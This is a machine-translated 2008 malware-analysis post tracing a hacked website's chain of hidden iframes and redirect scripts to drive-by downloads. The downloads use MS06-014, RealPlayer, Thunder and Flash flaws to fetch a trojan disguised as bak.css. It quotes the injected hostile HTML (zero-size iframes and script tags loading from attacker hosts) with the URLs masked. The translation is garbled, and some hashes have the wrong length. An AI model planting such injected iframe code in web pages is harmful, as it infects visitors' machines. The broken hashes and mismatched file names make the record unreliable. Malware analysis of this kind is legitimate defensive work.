A website hanging Trojan-Downloader.SWF.Small Using Flash Vulnerability spread Trojan-Downloader.Win32.Small

A website hanging Trojan-Downloader.SWF.Small Using Flash Vulnerability spread Trojan-Downloader.Win32.Small

Original endurer
2008-06-02 1st

This website containsCode:
/---
<IFRAME src = hxxp: // www. m ** M * E * x * E **. com/alexa.html width = 0 Height = 0> </iframe>
---/

#1 hxxp: // www. m ** M * E * x * E **. com/alexa.html:
/---
<Script language = "JavaScript" type = "text/JavaScript">
Window. Location = "hxxp: // www. U ** I ** U ** ou.net/6.htm ";
</SCRIPT>
---/

#1.1 hxxp: // www. U ** I ** U ** ou.net/6.htmpackage containing code:
/---
<IFRAME src?news.html width = 100 Height = 0> </iframe>
---/

#1.1.1 hxxp: // www. U ** I ** U ** ou.net/news.html

During decryption, Kaspersky detected the Trojan horse.ProgramTrojan-Downloader.JS.Agent.byj

Output code:
/---
<SCRIPT src = hxxp: // * fuck **. g ** o-* 3 ** 6*0 *. Net/ms06014.js> </SCRIPT>
<Embed src = hxxp: // * fuck **. g ** o-* 3 ** 6*0 *. Net/versionff.swf width = 0 Height = 0>
<IFRAME Style = display: None src = "hxxp: // * fuck **. g ** o-* 3 ** 6*0 *. net/glworld.html "> </iframe>
<Script language = "JavaScript" src = hxxp: // * fuck **. g ** o-* 3 ** 6*0 *. net/real. JS> </SCRIPT>
<IFRAME Style = display: None src = "hxxp: // * fuck **. g ** o-* 3 ** 6*0 *. net/real.html "> </iframe>
<IFRAME width = 100 Height = 0 src = hxxp: // * fuck **. g ** o-* 3 ** 6*0 *. net/thunder.html> </iframe>
---/

#1.1.1.1 hxxp: // * fuck **. g ** o-* 3 ** 6*0 *. Net/ms06014.js (Kaspersky has detected the trojan program Trojan-Downloader.JS.Small.lw)

Download hxxp: // user1 ***. 1 *** 2 ***-*** 23.net/bak.css with MS06-014 Vulnerability

File Description: D:/test/bak.css
Attribute: ---
M $ Signature: No
PE file: Yes
An error occurred while obtaining the file version information!
Created at: 12:13:57
Modification time: 12:13:57
Size: 13840 bytes, 13.528 KB
MD5: 7806c316c9643b85d9a7229be7273de0
Sha1: a37f4233ad1ebc1548c65b041491a7004454d413
CRC32: 2ae34afc

Kaspersky report for Trojan-Downloader.Win32.Small.iyq, rising for Trojan. DL. win32.mnless. Agu

#1.1.1.2 hxxp: // * fuck **. g ** o-* 3 ** 6*0 *. Net/glworld.html

Download hxxp: // user1 **. 1 ** 2 **-** 23.net/bak.css

#1.1.1.3 hxxp: // * fuck **. g ** o-* 3 ** 6*0 *. Net/real. js

Download hxxp: // user1 ***. 1 ***-*** 23.net/bak.css with RealPlayer (ierpctl. ierpctl.1, CLSID: CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA) Vulnerability

#1.1.1.4 hxxp: // * fuck **. g ** o-* 3 ** 6*0 *. Net/real.html

Download hxxp: // user1 ***. 1 ***-*** 23.net/bak.css with RealPlayer (ierpctl. ierpctl.1, CLSID: CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA) Vulnerability

#1.1.1.5 hxxp: // * fuck **. g ** o-* 3 ** 6*0 *. Net/thunder.html
Using thunder (dpclient. VOD, CLSID: F3E70CEA-956E-49CC-B444-73AFE593AD7F
Download hxxp: // user1 **. 1 ** 2 **-*** 23.net/bak.css

#1.1.1.6 hxxp: // * fuck **. g ** o-* 3 ** 6*0 *. Net/versionie.swf
Use the Flash (shockwaveflash. shockwaveflash.9) vulnerability to download hxxp: // user1 **. 1 ** 2 **-** 23.net/bak.css

File Description: D:/test/versionie.swf
Attribute: ---
M $ Signature: No
PE file: No
An error occurred while obtaining the file version information!
Created at: 12:13:56
Modification time: 12:35:34
Size: 133 bytes
MD5: e1bc4891359a7a8b4aabc83759417be
Sha1: 4a177911641401a58c22d00545a67b91ebb79e66
CRC32: 9e640000f

Kaspersky Report: Trojan-Downloader.SWF.Small.bb

#1.1.1.7 use baidubar. tool to download hxxp: // * fuck **. g ** o-* 3 ** 6*0 *. Net/Baidu. Cab, which contains baidu.exe